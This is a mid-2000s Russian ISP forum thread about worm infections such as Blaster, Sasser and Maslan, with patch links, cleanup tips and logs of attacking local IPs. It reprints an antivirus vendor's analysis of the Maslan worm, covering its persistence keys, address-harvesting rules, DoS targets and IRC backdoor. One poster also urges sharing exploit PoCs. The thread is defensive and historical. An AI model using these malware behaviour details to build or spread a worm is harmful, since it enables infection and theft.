Уважаемые пользователи городской компьютерной сети "SolNet"!

В связи с увеличением случаев заражения компьютеров в нашей сети Служба технической поддержки ЗАО Сонет напоминает о
необходимости профилактики Ваших компьютеров при работе в сети.

1. Установка антивирусной программы при работе в нашей сети является ОБЯЗАТЕЛЬНОЙ! При пользовании антивирусом ОБЯЗАТЕЛЬНО
обновляйте антивирусные базы через Интренет. Бесплатно скачать последнии версии популярных антивирусов Вы можете с нашего
сервера:

ftp://192.168.11.11/Soft/Antivirus/

(мы рекомендуем последнюю версию Dr.Web, как наиболее хорошо зарекомендовавшую себя в работе)

2. Пользователям операционных систем MS Windows 2000/XP ОБЯЗАТЕЛЬНО установить исправления (патчи безопасности) для Ваших
версий системы!

Бесплатно скачать патчи Вы можете с нашего сервера:

а. От заражения вирусом W32.Blaster.Worm

Для Windows 2000 (английская версия) - ftp://192.168.11.11/SP&hotfixes/KB823980/Windows2000-KB823980-x86-ENU.exe
Для Windows 2000 (русская версия) - ftp://192.168.11.11/SP&hotfixes/KB823980/Windows2000-KB823980-x86-RUS.exe
Для Windows XP (английская версия) - ftp://192.168.11.11/SP&hotfixes/KB823980/WindowsXP-KB823980-x86-ENU.exe
Для Windows XP (русская версия) - ftp://192.168.11.11/SP&hotfixes/KB823980/WindowsXP-KB823980-x86-RUS.exe

b. От заражения вирусом W32.Sasser.Worm

Для Windows 2000 (английская версия) - ftp://192.168.11.11/SP&hotfixes/KB835732/Windows2000-KB835732-x86-ENU.EXE
Для Windows 2000 (русская версия) - ftp://192.168.11.11/SP&hotfixes/KB835732/Windows2000-KB835732-x86-RUS.EXE
Для Windows XP (английская версия) - ftp://192.168.11.11/SP&hotfixes/KB835732/WindowsXP-KB835732-x86-ENU.EXE
Для Windows XP (русская версия) - ftp://192.168.11.11/SP&hotfixes/KB835732/WindowsXP-KB835732-x86-RUS.EXE


После установки исправлений (патчей безопасности) перезагрузите компьютер, затем скачайте и запустите три
программы-сканера для проверки и
удаления трех самых опасных вирусов (сетевых червей) в сети!

Бесплатно скачать эти программы-сканеры Вы можете с нашего сервера:

ftp://192.168.11.11/Soft/Antivirus/!antiblast/FixBlast.exe
ftp://192.168.11.11/Soft/Antivirus/!antisasser/FixSasser.exe
ftp://192.168.11.11/Soft/Antivirus/!antimydoom/FxNovarg.exe

(скачайте их на свой компьютер, запустите и нажмите на кнопку "Start"!)

Служба тех. поддержки ЗАО Сонет напоминает, что "зараженные" компьютеры несут угрозу безопасности и нормальной работе
сети.
Пользователи систематически невыполняющие правила работы в сети, и "зараженные" компьютеры которых привели с сбоям
работы компьютерной сети БУДУТ ОТКЛЮЧАТЬСЯ И БЛОКИРОВАТЬСЯ БЕЗ ПРЕДУПРЕЖДЕНИЯ до выяснения и (или) устранения причины....

Установил себе доктор веб с вашего сайта но он не хочет обновляться с интернета! интернет включён.Может чего не так делаю? :confused:

Возможно ключ уже заблокирован.... Попробуйте найти новый ключ или приобретите лизензию....

Олег ты раньше говорил про заплатку от Lovescana, можно еще разок её выложить?

ftp://192.168.11.11/Soft/Antivirus/!antiblast/FixBlast.exe

Lovesan он же MsBlast

Другое название Win32.HLLW.LoveSan - W32.Blaster.Worm. Заплатки в первом посте.......

Вопросик можно! Как долго он будет атаковать? А то задолбал! И он чего нападает только на win2000 или нет.У меня ХР стоял так я о нём и не слышал, а тут поставил 2000 профи, то и дело отражение атаки! :cool:

Эммм.. А это для какого SP XP Патчи? А то выдал такие картинки.. значить мене не надо или как?

Это патчи для WindowsXP и WindowsXP SP1..... Если установлен SP2 - дополнительной установки патчей НЕ ТРЕБУЕТСЯ.

У меня СанЛав. Я установил заплатку, но просканить комп не удаётся из-за того, что после включения проходит минута и выскакивает табличка, что через 50 секунд перезагрузится компьютер и нада сохранить все несохранённые данные, в противном случае они все будут утеряны.(Не хватает времени на сканирование) У меня есть программа, которая отражает эту атаку. Но после отражения сканер не видит вирус! Что делать ?

У меня СанЛав.

ЛавСан еще ни чего... у меня долго был Maslan.b.....но вроде пропал.
А табличка о перезагрузе все равно выскакивает
:mad: :mad: :mad:

Скачай эту программу от Microsoft... И запусти ее...... она все вылечит...

Аннотация
Корпорация Майкрософт выпустила программу «Средство удаления вредоносных программ», предназначенную для удаления некоторых типов распространенных вредоносных программ с компьютеров под управлением Windows Server 2003, Windows XP и Windows 2000. Данное средство заменяет все средства удаления вирусов, выпущенные ранее корпорацией Майкрософт. Чтобы загрузить данное средство, обратитесь на веб-узел центра загрузки корпорации Майкрософт. Кроме того, можно запустить данное средство через Интернет. Для этого обратитесь на веб-страницу Malicious Software Removal Tool веб-узла Microsoft.com. Чтобы запустить данное средство, необходимо войти в систему, используя учетную запись, являющуюся членом локальной группы «Администраторы». На компьютерах под управлением Windows XP данное средство можно также запустить с веб-узла Windows Update или с помощью служб автоматического обновления.

Семейство вредоносных программ - Версия средства - Уровень опасности*
Win32/Berbew - Январь 2005 г. - Средний
Win32/Doomjuice - Январь 2005 г. - Критический
Win32/Gaobot - Январь 2005 г. - Средний
Win32/MSBlast - Январь 2005 г. - Критический
Win32/Mydoom - Январь 2005 г. - Средний
Win32/Nachi - Январь 2005 г. - Критический
Win32/Sasser - Январь 2005 г. - Критический
Win32/Zindos - Январь 2005 г. - Средний

http://support.microsoft.com/?kbid=890830

http://help.solnet.ru/soft/Windows-KB890830-RUS.exe
или
ftp://192.168.11.11/SP&hotfixes/KB890830/
или

Cпасибо Viper :D :D :D

БлиН! :( не фига ! как было так и осталось! :(
или я что-то не правильно делаю! :( или это вобще не ЛавСан.. а что-то похуже..

У меня СанЛав. Я установил заплатку, но просканить комп не удаётся из-за того, что после включения проходит минута и выскакивает табличка, что через 50 секунд перезагрузится компьютер и нада сохранить все несохранённые данные, в противном случае они все будут утеряны.(Не хватает времени на сканирование) У меня есть программа, которая отражает эту атаку. Но после отражения сканер не видит вирус! Что делать ?Ух ты! Отражает атаку! Ух ты!
На самом деле комп даёт сбой и идёт перезагружаться при попытке заразить чужой заражённый комп.:(
Итак у тебя есть пара минут чтобы выполнить следующие действия:
1. запустить диспетчер задач
2. убрать процессы с названиями MSBLAST и TFTP####, где вместо #### могут быть какие-то символы. Ещё вири любят называться типа svchost, но не svchost... а например svohost или svoch... или printsrv или usbdrv или что-то типа того... похоже на правдоподобное...
Убил все подозрительные процессы, а комп ещё не завис? Значит тебе повезло и ты ни одного важного системного процеса не тронул. Теперь у тебя есть время заняться делом. Комп не станет перезагружаться.
3. запустить сканер-антивирус с обновлёнными базами (с необновлёнными он нафиг не нужен)
4. и будет вам счастье.;)

1)Когда появляется табличка вирусная, то в диспетчере, во всех образцах, пишется (нет данных) и они не завершаются
2)Максимум что похоже это "MsPMSPSv.exe"... больше ничего подозрительного, на мой взгляд, нет...
и что должно произойти, табличка исчезнет или что?

What is mspmspsv.exe? Is mspmspsv.exe spyware or a virus?

Process name: Windows Media Player Service
http://www.neuber.com/img/space.gif
Product: Media Player 7 (http://www.microsoft.com/)
http://www.neuber.com/img/space.gif
Company: Microsoft (http://www.microsoft.com/)
http://www.neuber.com/img/space.gif
File: mspmspsv.exe
http://www.neuber.com/img/space.gif
Security Rating:



The WMDM PMSP service will be installed with Windows Media Player 7 on Windows 2000 and is necessary for MS Digital Rights Management. The service allows WMDM (Windows Media Device Manager) to copy audio content from a computer to a portable audio player. You can disable this service if you don't use Media Player. On Windows XP/2003 the WMDM PMSP service is an instance of svchost.exe called Portable Media Serial Number.

Get more detailed information about mspmspsv.exe and all other running background processes with Security Task Manager (http://www.neuber.com/taskmanager). Note: Any malware can be named anything - so you should check where the files of the running processes are located on your disk. If a "non-Microsoft" .exe file is located in the C:\Windows or C:\Windows\System32 folder, then there is a high risk for a virus, spyware, trojan or worm infection! Check it out! (http://www.neuber.com/taskmanager)

и что должно произойти, табличка исчезнет или что?Если успеешь до её появления, то и не появится.

Интересно, почему эта прога-сканер Windows-KB890830-RUS так быстро работает (не более 2х секунд)?
Или её надо запускать с параметрами?

Интересно, почему эта прога-сканер Windows-KB890830-RUS так быстро работает (не более 2х секунд)?
Или её надо запускать с параметрами?
Программа проверяет именно запущенные процессы (реальную активность) вирусов.

Обнаружение и удаление вредоносных программ
• После принятия условий лицензионного соглашения данное средство выполняет поиск известных вредоносных программ в памяти компьютера и завершает работу обнаруженных вредоносных процессов, а также удаляет файлы и элементы реестра, сопоставленные этим процессам.
• Средство удаления вредоносных программ обнаруживает только активные вредоносные программы. Полная проверка содержимого жесткого диска не выполняется.

To Viper: thanks, мне можно спать спокойно :)

после перестановки системы поймал лавскан, где то в сетке было описано как его убить и заплатка от него, плиз кто знает?

Нууууу...... На первой странице и на второй странице ЭТОЙ ТЕМЫ!!!!!! (Лавсан И Бластер - это одно и тоже)

А никто не подскажет где найти заплатки для Win32.Maslan.b - или у него есть второе название??? Заранее благодарю.

Автоматическое обновление Windows (бесплатное) от ЗАО "Сонет".(заплатки)
Так же читал что от него помогает
ftp://192.168.11.11/Soft/Antivirus/McAfee/
ftp://192.168.11.11/Soft/Antivirus/DrWeb/ с обновленными базами
ftp://192.168.11.11/Soft/Ad-aware.SE/

думется что это сканер игрушечный...
http://forum.solnet.ru/showpost.php?p=62347&postcount=19

У меня на компе нет вирусов я за этим слежу ! Сканю чютьли не каждый день с обновлениями !
У меня на компе запущена HLTVproxy которая веситна 33.12 и порт у меня не как обычно для CS не 27015 а 27020 (Half-Life 27014-27025)
так что решайти сами !

В интернете появился вирус Cisum.A, при загрузке которого на компьютере появляется надпись «You are an idiot» («Вы – идиот»), сообщает антивирусная компания Panda Software. Но пока что этим вирусом никто не заразился.

Cisum.A распространяется автоматически по компьютерным сетям. Если пользователь открывает зараженный файл с вирусом, тот копирует себя под именем ProjectX.exe на компьютере. Тут же появляется надпись «You are an idiot» и аудиофайл формата MP3, который непрерывно произносит эту фразу.

Самое неприятное, что Cisum.A прекращает работу антивирусных программ и других решений по IT-безопасности, поэтому зараженный компьютер становится полностью незащищенным перед атаками других вирусов и хакерских нападений.

В Panda Software признают, что пока Cisum.A не заразил ни одного компьютера, но все равно рекомендуют пользователям соблюдать меры безопасности при работе с файлами, полученными из интернета, и периодически обновлять свое антивирусное программное обеспечение. Другие антивирусные компании не зарегистрировали появления Cisum.A.// Тимофей Дзядко
http://www.sostav.ru/news/2005/01/28/27/

Как избавиться от Net-Worm.Win32.Maslan? Лекарство есть?

Net-Worm.Win32.Maslan.a
Другие версии: .b .c
Другие названия
Net-Worm.Win32.Maslan.a («Лаборатория Касперского») также известен как: Email-Worm.Win32.Maslan.a («Лаборатория Касперского»), Exploit-Lsass.g.gen (McAfee), W32.Maslan.A@mm (Symantec), Win32.HLLM.Alaxala (Doctor Web), W32/Maslan-A (Sophos), Win32/Maslan.A@mm (RAV), WORM_MASLAN.GEN (Trend Micro), Worm/Zusha.A (H+BEDV), W32/Maslan.A (FRISK), I-Worm/Maslan.A (Grisoft), Win32.Maslan.A@mm (SOFTWIN), Exploit.DCOM.Gen (ClamAV), W32/Maslan.A.worm (Panda), Win32/Maslan.A (Eset) Детектирование добавлено 05 дек 2004
Описание опубликовано 09 дек 2004
Поведение Email-Worm, почтовый червь
Технические детали


Вирус-червь, распространяющийся через интернет в виде вложений в зараженные электронные письма, а также по файлообменным сетям.

Рассылается по всем найденным на зараженном компьютере адресам электронной почты. Также вирус распространяется, используя уязвимости в службах LSASS (MS04-011) и RPC DCOM (MS03-039).

Червь является приложением Windows (PE EXE-файл), имеет размер около 49КБ, упакован FSG. Размер распакованного файла около 81КБ.

Червь содержит в себе бэкдор, принимающий команды по каналам IRC.

Инсталляция
После запуска червь может создавать в системном каталоге Windows следующие файлы:

%System%\___AlaDdos
%System%\___AlaFtp
%System%\___AlaMail
%System%\___AlaScan
%System%\___e
%System%\___j.dll
%System%\___m
%System%\___m
%System%\___n.EXE
%System%\___Prior
%System%\___r.exe
%System%\___t
Net-Worm.Win32.Maslan.a регистрирует себя в ключе автозагрузки системного реестра:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Windows DHCP"="%System%\___r.exe"
"Microsoft Synchronization Manager"="___synmgr.exe"
Червь создает уникальный идентификатор " ALAxALA" для определения своего присутствия в системе.

Распространение через email
Для поиска адресов жертв червь сканирует адресную книгу Microsoft Outlook, а также ищет адреса в файлах со следующими расширениями:

adb
asp
cfg
cgi
dbx
dhtm
eml
htm
jsp
mbx
mdx
mht
mmf
msg
nch
ods
oft
php
pl
sht
shtm
stm
tbb
txt
uin
wab
wsh
xls
xml


При этом червем игнорируются адреса, содержащие следующие подстроки:

abuse
acketst
anyone
arin.
avp
berkeley
borlan
bsd
bugs
ca
contact
example
feste
fido
foo.
fsf.
gnu
gold-certs
google
help
iana
ibm.com
ietf
info
inpris
isc.o
isi.e
kernel
linux
math
me
mit.e
mozilla
mydomai
mysql
no
nobody
nodomai
noone
not
nothing
page
panda
pgp
postmaster
privacy
rating
rfc-ed
ripe.
root
ruslis
samples
secur
sendmail
service
site
soft
somebody
someone
sopho
spam
spm
submit
syma
tanford.e
test
the.bat
unix
usenet
utgers.ed
webmaster
www
you
your


При рассылке зараженных писем червь пытается осуществить прямое подключение к SMTP-серверам.

Характеристики зараженных писем
Отправитель:
Комбинируется по частям из следующих списков:

Имя:

accoun
admin
Alan
Andrew
Angel
Anna
Arnold
Bernard
Carter
certific
Chris
Christian
Conor
Ghisler
Goldberg
Green
Helen
Ivan
Jackson
John
Kramer
Kutcher
listserv
Liza
Lopez
Mackye
Maria
Miller
Nelson
ntivi
Peter
Robert
Ruben
Sarah
Scott
Smith
Steven
subscribe


Домен отправителя:

aol.com
freemail.com
hotmail.com
mail.com
msn.com
yahoo.com
Тема письма:
123
Текст письма:
Hello <случайное имя>,
--Best regards,
Имя файла-вложения:
Playgirls2.exe
Действие
Червь сканирует жесткий диск, чтобы найти exe-файлы, путь до которых содержит следующие строки:

distr
downlo
setup
share
upload
Червь записывает себя вместо оригинальных файлов, копируя их в создаваемую в корне диска С: директорию "___b", попадая, таким образом, в папки файлообменных сетей.

Также червь пытается выгрузить из системы различные межсетевые экраны и антивирусные программы.

Червь реализует DoS-атаку на следующие сайты:

chechenpress.com
chechenpress.info
kavkaz.org.uk
kavkaz.tv
kavkaz.uk.com
kavkazcenter.com
kavkazcenter.info
kavkazcenter.net
Удаленное администрирование
Червь открывает на зараженной машине произвольный TCP-порт для соединения с IRC-каналами для приема команд.

Прочее
Net-Worm.Win32.Maslan.a содержит следующие строки:

Hah: Mydoom, Bagle, etc: since then you do not have future more!

http://securityresponse.symantec.com/avcenter/venc/data/w32.maslan.a@mm.html

Просканировал компьютер программой RetinaRPCDCOM - нашел у себя вирус, установил нужные заплатки...
Как удалить сам вирус с компьютера ???

Просканировал компьютер программой RetinaRPCDCOM - нашел у себя вирус, установил нужные заплатки...
Как удалить сам вирус с компьютера ???
.....

После установки исправлений (патчей безопасности) перезагрузите компьютер, затем скачайте и запустите три
программы-сканера для проверки и
удаления трех самых опасных вирусов (сетевых червей) в сети!

Бесплатно скачать эти программы-сканеры Вы можете с нашего сервера:

ftp://192.168.11.11/Soft/Antivirus/!antiblast/FixBlast.exe
ftp://192.168.11.11/Soft/Antivirus/!antisasser/FixSasser.exe
ftp://192.168.11.11/Soft/Antivirus/!antimydoom/FxNovarg.exe

Такое повторяется слишком часто.
192.168.35.115 - Примите меры!

меры должен принять ты! поставь заплатки что бы тебя ничего не тревожело.

Фига... ну и заявы... Всегда думал, что, согласно Договору, пользователь обязан следить за отсутствием у него вредоносных программ...
А реакция программы вполне естественная...

меры должен принять ты! поставь заплатки что бы тебя ничего не тревожело.
Меня вобщем-то ничего не тревожит, это я к сведению владельца 35.115... вдруг он не в курсе? :wink:

При установке Serv-U - ругается Касперский:not-a-virus:Risk.Ware...
Можно проигнорировать?

При установке Serv-U - ругается Касперский:not-a-virus:Risk.Ware...
Можно проигнорировать?Да.
http://forum.solnet.ru/showthread.php?t=2324
http://forum.solnet.ru/showthread.php?t=4075

Антивирусные компании предупреждают о появлении большого количества новых модификаций вредоносной программы Mytob. Только за последние несколько дней специалисты по вопросам сетевой безопасности обнаружили восемь новых вариантов этого червя, а с начала марта их число уже превысило двенадцать.

Вирус Mytob распространяется по электронной почте в виде вложений с различными названиями, а также через дыру в локальной подсистеме аутентификации пользователей (LSASS) операционных систем Microsoft Windows 2000/ХР. После проникновения на компьютер червь создает в системной директории Windows свою копию под именем msnmsgr.exe и затем регистрируется в реестре с целью обеспечения собственного автозапуска при каждом старте ОС.

В процессе организации массовых рассылок вредоносного кода Mytob применяет встроенный SMTP-сервер, адреса жертв при этом извлекаются из файлов с определенными расширениями на жестких дисках инфицированной машины. Кроме того, вредоносная программа открывает "черный ход" в систему для приема команд от авторов.

В настоящее время известно о более чем полутора десятках модификаций вредоносной программы Mytob. Большая их часть практически идентичны, хотя вариант Mytob.Q имеет в своем составе другой малоопасный вирус W32.Pinfi. Компания Symantec присвоила червям семейства Mytob рейтинг средней опасности, обновления антивирусных баз данных для защиты от этой вредоносной программы уже выпущены. Кроме того, доступна специальная утилита для удаления вариаций вируса. Ее можно взять
тут (ftp://192.168.36.145/Pub/Soft/net/FixMytob.exe)
Она удаляет следуйщие вариации вируса
* W32.Mytob@mm
* W32.Mytob.B@mm
* W32.Mytob.L@mm
* W32.Mytob.M@mm
* W32.Mytob.R@mm
* W32.Mytob.U@mm
--------------------------------------
Источник: www.nnm.ru (http://www.nnm.ru)

У меня Win XP. Подскажите, где выключается "System Restore" (восстановление системы)?

У меня Win XP. Подскажите, где выключается "System Restore" (восстановление системы)?
Пуск-правая кнопа на Мой комп - свойства - восстановление системы

Спасибо, JEwKA

Следите за своим компом

Чесно говоря подобных атак бывает в день порядка 200-300, но хорошая защита+ антивирус с монитором могут избавить от необходимости очень часто проверять компьютер. Мой выбор Outpost 2 + Kaspersky

Внимание!!! По сети ползают сетевые атаки вида LSASS Exploit
Им не страшен не оутпост не касперский.
Сам вирус удаленному компьютеру меняет в регистре 5 параметров. В результате чего к примеру теже игры начинают "глючить", в виде Неправильного отображения видопотоков. Для устранения этого вируса вам понадобится spybot и утилита, которая прикреплена к этому посту.
Для начала скажу что атаки исходят в основном с 192.168.20.141 - Просьба владельцу провериться и удалить противный червь.

Принял)

Помимо всего данный червь делает IE уязвимым и дает возможность посторонним людям проникать на ваш компьютер(основная проблема это мгновенное восстановление в регистре своих параметров). Выкладываю еще один фиксер, он грамотно удаляет сами основы DSO exploit

18.09.2005 22:45:26 DCOM Exploit attack
from 192.168.13.67:135
18.09.2005 22:45:41 DCOM Exploit attack
from 192.168.13.119:135
18.09.2005 22:48:25 DCOM Exploit attack
from 192.168.13.67:135
18.09.2005 22:48:45 DCOM Exploit attack
from 192.168.13.119:135
18.09.2005 22:51:49 DCOM Exploit attack
from 192.168.13.119:135
18.09.2005 22:53:11 DCOM Exploit attack
from 192.168.13.67:135
18.09.2005 22:54:53 DCOM Exploit attack
from 192.168.13.119:135
18.09.2005 22:57:57 DCOM Exploit attack
from 192.168.13.119:135
18.09.2005 23:01:04 DCOM Exploit attack
from 192.168.13.119:135
18.09.2005 23:04:05 DCOM Exploit attack
from 192.168.13.119:135
Это последнии 10 атак

Исходя из 16-го поста хочу проверить свои процессы, как это легче сделать?(ранее вложенные файлы не качаются!)

nightcrawler спасибо за информацию dsofix нашол и исправил три ошибки

Я мало что понимаю в вирусах,но что-то похожее кажется словил.Когда загружаю сеть,появляется FUCK-PORTAL или что-то похожее.Там порнуха всякая,нафиг она мне нужна здесь!Кто может знает-что с этим делать?

Я мало что понимаю в вирусах,но что-то похожее кажется словил.Когда загружаю сеть,появляется FUCK-PORTAL или что-то похожее.Там порнуха всякая,нафиг она мне нужна здесь!Кто может знает-что с этим делать?http://forum.solnet.ru/search.php?searchid=342202
ftp://192.168.11.11/Soft/!AntiSpyware/Ad-aware.SE/ :wink:

Меня атаковал вирус Bloodhund exe скажите пожалуйста, что это за тип вируса и какую заплатку от него поставить?Что характерно ни одна программа его не берёт!И даже Программа удаления вредоносных программ. Она его вообще не замечает.

http://forum.solnet.ru/search.php?searchid=342202
ftp://192.168.11.11/Soft/!AntiSpyware/Ad-aware.SE/ :wink:
у меня ссылка на страничку не открывается =(
а трабл такой же есть =( бросает на страницу с какими-то предложениями покупки/продажи :sty080:
объясни, пожалуйста, что с этими прогами делать и шо це есть вообще? ,) =)

Может стоить опять проверить всем свои подсети?

не, ну сделайте что-нибудь уже:censored:

на полосу прокрутки посмотрите в скриншоте. скока же можно атаковать-то

Вот скрин моего антивиря, не так много....

Внимание!!! По сети ползают сетевые атаки вида LSASS Exploit
Им не страшен не оутпост не касперский.
Сам вирус удаленному компьютеру меняет в регистре 5 параметров. В результате чего к примеру теже игры начинают "глючить", в виде Неправильного отображения видопотоков. Для устранения этого вируса вам понадобится spybot и утилита, которая прикреплена к этому посту.
Для начала скажу что атаки исходят в основном с 192.168.20.141 - Просьба владельцу провериться и удалить противный червь.
пробовал все выше перечисленое. ни что не помогло... не знаю уже что делать с этой гадостью... борюсь уже 3 месяца, бывает что на час по 30 перезагрузок делает... что делать??? может я что то не так делаю???

глупый вопрос какие нужны вспомагательные проги для антивируса касперский персонал прочитал парустраниц нече непонял пожалуста выложите сюда сылки то что нужна касперскому

может тебе нужен просто ключик???Для него???Если да то поиск по форуму тебе поможет!!!

ключик есть он у меня лецензионый касперский

18:19:29 Moyari13 атака from 192.168.15.224 by outpost

Мне тож выдал такое outpost 18:21:58 Moyari13 attack 192.168.15.224
а что енто такое?

Аналогичная ситуация.
Вот что нашёл по этому поводу:
"orvman
25-01-2005, 04:58
А это типа посылается некорректный ICMP пакет, переполняется стек, система падает. Сейчас абсолютно все фаеры по дефолту отлавливают. Такая атака действует на 95/98 виндах для его дауна, если у тебя хр (+SP2) - спи спокойно - этой атакой систему не вырубишь (есть такая прога - languard network security scanner - иногда она такую атаку имитирует при сканировании портов). Скорее всего тебя просто сканируют."

Я тоже прежде чем суда написать полазил в инете, но судь в том что делается это на меренно или просто баловство если баловство то есть такая вот цитата:Несанкционированные проверки уязвимости могут быть отнесены к уголовно наказуемому деянию согласно статьям 272 и 274 УК РФ (максимальное наказание - лишение свободы на срок до семи лет). а администрации стоит наказать шутника....

Тоже самое.18:22:51 Moyari13 атака 192.168.15.224 . 19:11:23 Moyari13 атака 192.168.13.180

Да что вы боитесь так, галочку поставьте не уведомлять об атаках и все,
это не кто не балуется это пользователи которые не посещяют форум,
у которых полон комп вирусов всяких, вот эти вирусы с помощью своей жертвы ищут следующюю жертву, сканируя порты и т.д.
вроде так...а там думайте сами!!!

Достал меня этот ЛАВСАН! Вношу предложение: выкладывать адреса с которых эта дрянь портит нам жизнь. Может быть люди не знают что их комп заражен. Мы победим! Ура!
Итак, вчера (18 января):
192.168.18.117
192.168.18.131
192.168.18.232
192.168.18.168
Сегодня (19 января):
192.168.18.217
192.168.18.232

PS Люди! Здесь все как в жизни. Не забывайте предохраняться. Лично я рекомендую контрацептивы от лаборатории Касперского.

пожалуйста:

Люди,а 18.211 там в такой нехорошей деятельности не отмечен?

Отмечен 12.213, если кто знает, кто это, посоветуйте ему провериться, а то он задолбал уже!!! Сил нет как!!!

Я поражаюсь, как можно иметь у себя в системе дыры 2,5 летней давности.... Это жестко...

У кого Касперский 5 : поставьте вы галочку "не уведомлять о сетевых атаках" и спите спокойно !!!!:sty067:

следите да своим барахлом

следите да своим барахлом
это точно!!!

Сегодня (20 января) к Ордену Хранителей Лавсана присоединился 192.168.18.114 Мы теряем позиции!!!

Мой firewall обнаружил по 20-30 атак с периодичностью 15-20 сек. с каждого адреса:

192.168.20.126
192.168.28.13
192.168.35.153
192.168.36.217
192.168.37.118

И еще 212.114.14.104...??

Если кто обнаружит атаку с моего адреса (20.106) сообщите, пожалуйста, в приват. Буду чистить машину.

Если кто обнаружил атаку с моего адреса (20.106) сообщите, пожалуйста, в приват. Буду чистить машину.
Аналогично (18.124)

А меня достали владельцы IP адресов 36.198 и 36.226.
С их адресов проходит по 10-15 атак за минуту...

а меня 20.134 задолбал....за 30 минут каспер отбил 418 атак.......засада какая то....

Прибавился сегодня 18.169

меня атаковали с 33.217

а меня 20.134 задолбал....за 30 минут каспер отбил 418 атак.......засада какая то....Да. Недели 2 уже. Пора отключать его от сети! Забодал!!!:thumbsdow

Еще добавились:
192.168.18.120
192.168.40.153

Лично мне кажется, что тут бестолку писать адреса. Владельцы этих компьютеров либо не читают эту тему, либо не заходят на форум вообще, хотя в договоре написано что делать это следует регулярно (п. 9.6).

G3NiUS:Лично мне кажется, что тут бестолку писать адреса. Владельцы этих компьютеров либо не читают эту тему, либо не заходят на форум вообще...
...либо не знают свой адрес и вообще что это такое, зато знают как без всякой защиты лазить по порносайтам.

Лично мне кажется, что тут бестолку писать адреса.
А мы упертые, может кто и увидит когда-нибудь свой адрес...
в этих списках!!!(не именно в этих)

+ 192.168.37.140

Заметил, что атаки идут только тогда, когда человек заходит на мой FTP сервер. Вчера FTP был выключен и ни одной атаки не зафиксировано.

Меня просто достал 33.217..Если знаете кто это,скажите ему о вирусе!!!!2 часа атаки отбиваю!

Народ перестаньте страдать ***ней... то что вы пишите полнейший бред.. и он никому не нужен... Поставте багфиксы + настройте свой брендмауер... и спите спокойно... MSBlast, Sasser и им подобные уже старые черви... и не представляют никакую опасность, если система поставлена с исправлениями... лучше пишите стоящие вещи - по типу "Найдена новая дыра там-то..." и выкладывайте РОС-сплойты (=

Прибавился сегодня 18.169
Попрашу помочь разобраться с этой дряню, мне она сама надоела перепробовал всё что было написона ранними постами эффект нулевой!!!

Народ перестаньте страдать ***ней... то что вы пишите полнейший бред.. и он никому не нужен... Поставте багфиксы + настройте свой брендмауер... и спите спокойно... MSBlast, Sasser и им подобные уже старые черви... и не представляют никакую опасность, если система поставлена с исправлениями... лучше пишите стоящие вещи - по типу "Найдена новая дыра там-то..." и выкладывайте РОС-сплойты (=
Т.е. когда на тебя идут атаки, нагрузки на сеть в этот момент нет?:w00t:

Т.е. когда на тебя идут атаки, нагрузки на сеть в этот момент нет?:w00t:

Что бы забить твой канал понадобится приличное количество машин-зомби... а 1-5 тачек которые пытаются использовать переполнение буффера, серьезной опасности не представляет... они же не посылают тебе "шторм" запросов... поэтому об уменьшении канала и речи быть не может...

Попрашу помочь разобраться с этой дряню, мне она сама надоела перепробовал всё что было написона ранними постами эффект нулевой!!!
Поставь последнего каспера, обнови через инет, и проверяй комп,
если у нас касперы, видят твой вирус, твой тоже найдет!

Что бы забить твой канал понадобится приличное количество машин-зомби... а 1-5 тачек которые пытаются использовать переполнение буффера, серьезной опасности не представляет... они же не посылают тебе "шторм" запросов... поэтому об уменьшении канала и речи быть не может...
ну да конечно)) с 5 машинок легко можно канал зас*ать и машинку чуть подвесить... ;)

Плиз,подскажите можно обновить базы с вашего сервера?антивирус стоит kav5.0.325_personalru.

ну да конечно)) с 5 машинок легко можно канал зас*ать и машинку чуть подвесить... ;)

так и знал что меня не поймут... я не говорил о распределенных DOS-атаках... я говорил что эти сетевые черви не смогут забить ваш канал. У них другой принцип... А при надобности можно и одной тачкой убить чужой комп... так что думайте.. стоит ли разводить весь этот флейм... Единственная польза от этой ветки, сообщать пользователям что они заразны... Но как я думаю они даже не знают о его существовании.

Народ не страдайте фигнёй!!!! Отключите уведомление о сетевых атаках, ну и включить бан атакующих машин.

... я не говорил о распределенных DOS-атаках... я говорил что эти сетевые черви не смогут забить ваш канал. У них другой принцип...
:offtopic: DoS это раз)
и смотря какой червь.. :wink: эт два) может..

Поставь последнего каспера, обнови через инет, и проверяй комп,
если у нас касперы, видят твой вирус, твой тоже найдет!
Не помогло, спасибо за совет! Что можно ещё сделать?

Постоянно атакуют следующие адреса: 35.16, 35.181, 35.162, 35.164 и 35.194, как понимаю это один и тот же человек, потому что атаки RPC DCOM и сканирование портов постоянно... Я его уже просто заблокировал.
И пару раз заметил 12.210 хотел нюкнуть irc.solnet.ru (212.45.28.186).

:hi: Я у себя пока ничего особо криминального не замечал. (у меня XP SP2 corp) Каспер отрабатывает всё на УРА(проверяюсь минимум раз в два дня). Хотя OUTPOST несколько раз отмечал атаки. Кстати, если кто заметит атаку от меня (17.206) огромная просьба крикните или на приват а лучше в аську

35.194
ваще комп не включай))))))) это ужс какой-то постоянно атакует

Народ!!!! Уже пол года меня достаёт одна фигня, постоянно меняется стартовая страница на www.start.traffer.ru (http://www.start.traffer.ru) чем я только не пользовался что бы это исправить. Все программы по поиску вредоносных программ её находят, я жму удалить, исправить всё проходит успешно, но после перезагрузки опять двадцать пять. Мож кто знает как с этим бороться

Народ!!!! Уже пол года меня достаёт одна фигня, постоянно меняется стартовая страница на www.start.traffer.ru (http://www.start.traffer.ru) чем я только не пользовался что бы это исправить. Все программы по поиску вредоносных программ её находят, я жму удалить, исправить всё проходит успешно, но после перезагрузки опять двадцать пять. Мож кто знает как с этим бороться

хмм... сомнительная страничка... ((=
Ответ простой не лазить по порнухе и прочей дряни... Так же проверить запущенные процессы + Реестр(ключи автозапуска, их много). Короче говоря. есть что-то, которое сидит где-то и пакостит... ((=

Спасите помогите, чо у меня за такое выскочило?:w00t:

Сегодня ночью, в очередной раз обновив антивирусные базы Касперского, решил провести полную проверку системы.
Антивирус нашел троян Backdoor.Win32.ServU-based.af в файле SERVUDAEMON.exe и естественно удалил его.
То же самое Касперский обнаружил и в дистрибутиве Serv-U.
Я подумал, что подхватил эту заразу блуждая по просторам интернета и решил скачать инсталлятор заново, НО...
Откуда бы я ни качал, ВЕЗДЕ дистрибутив Serv-U версии 6.1.0.4 заражен этим трояном! Перепробовал 8(!) ссылок в поисковике (в том числе и на 12.12).
Кто пользуется этой версией программы рекомендую обновить антивирусные базы и провести проверку.
Базы для Касперского я выложил в DC++

